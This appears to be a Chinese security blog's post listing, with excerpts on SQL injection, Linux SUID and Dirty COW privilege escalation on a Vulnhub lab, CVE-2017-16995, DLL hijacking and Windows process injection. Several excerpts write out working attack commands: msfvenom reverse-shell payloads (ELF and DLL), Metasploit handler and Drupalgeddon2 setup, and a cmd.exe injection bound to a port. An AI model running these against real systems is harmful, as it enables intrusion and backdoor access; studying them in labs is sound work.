- 博客(7)
- 收藏
- 关注
转载 sql注入_报错注入中的count()、rand()、group by()函数原理分析
想要了解的朋友的可以看看下面链接里的文章,写的非常棒,理解起来清晰透彻。https://www.2cto.com/article/201604/498394.html假设我们的查询语句select count(*), (floor(rand()*2)) as key from tables group by key在使用count()函数和group by 函数时会产生一个虚拟表,这个虚拟表中只有俩个字段,一个是key,一个是count(*),同时这个虚拟表有个特性,就是当数据插入到其中
2022-01-20 17:33:56 761
原创 sql注入_字符型、数字型判断
如何判断sql注入是字符型还是数字型?在进行sql注入时,字段类型分为字符型或者数字型,意味着我们需要构造不同的sql语句。假设存在sql注入的url是:http://192.168.0.1/id=1数字型判定1、and或者or假设数据库的执行语句是:select * from table where id=$id当查询id=1的页面时返回正常页面,此时执行的语句是:select * from table where id=1假如在1后面加上 and 1=2 , $id的值就是1 and
2022-01-12 14:56:32 8122
原创 提权_Linux提权_suid
1.MSF连接目标机生成msf后门,上传到目标机,开启监听,等待运行。>msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=6666 -i 3 -f elf -o shell //生成后门>set payload linux/x64/meterpreter/reverse_tcp>set lhost 0.0.0.0>set lport 6666>exploit2
2021-12-08 15:28:07 2455
原创 提权_Linux 脏牛漏洞提权 【Vulnhub靶场 Lampiao】
1.nmap 扫描主机扫描同网段存活主机扫描目标主机开放端口,扫描到开放了1898端口nmap -p1-65535 192.168.61.1382.发现web网站,搜集利用漏洞通过开放的1898端口进入网站,看到目标网站,发现网站cms是drupalmsf 搜索drupal漏洞,使用可利用漏洞进行攻击>search drupal>use exploit/unix/webapp/drupal_drupalgeddon2>set rhosts 192.
2021-12-07 17:25:09 3319
原创 提权_【CVE-2017-16995】 Linux 内核漏洞提权
1.信息收集上传信息收集脚本,运行并查看是否有【CVE-2017-16995】漏洞这里我用到的信息收集脚本为:linux-exploit-suggester-2.plperl linux-exploit-suggester-2.pl2.上传EXP3.编译执行gcc 45010.c -o 45010 //编译45010.c./45010 //运行45010,运行不了就【chmod +x 45010】给他个执行权限
2021-11-29 13:00:55 2862
原创 提权_DLL劫持提权
1.通过火绒剑分析进程分析进程调用模块,找到可以利用的dll文件,本次试验劫持idmmkb.dll文件2.MSF生成后门dll木马msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.61.131 lport=8888 -f dll >C:\Users\Ninja\Desktop\idmmkb.dll3.上传替换4.MSF监听>use exploit/multi/handler>set payload
2021-11-23 16:07:48 1725
原创 提权_Windows 2003 进程注入提权
1.首先使用Process Injector进程注入工具,使用命令查看运行进程的PIDpinjector.exe -l这里我们注入进程services.exe,可以看到它是系统权限运行的进程,记住的它的PID:3562.接着使用命令注入刚才记住的进程,监听端口设置为9988pinjector.exe -p 356 cmd.exe 99883.最后我们使用 nc 监听本地9988的端口使用命令 whoami 可以看到注入提权成功。...
2021-11-22 09:56:59 1733
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人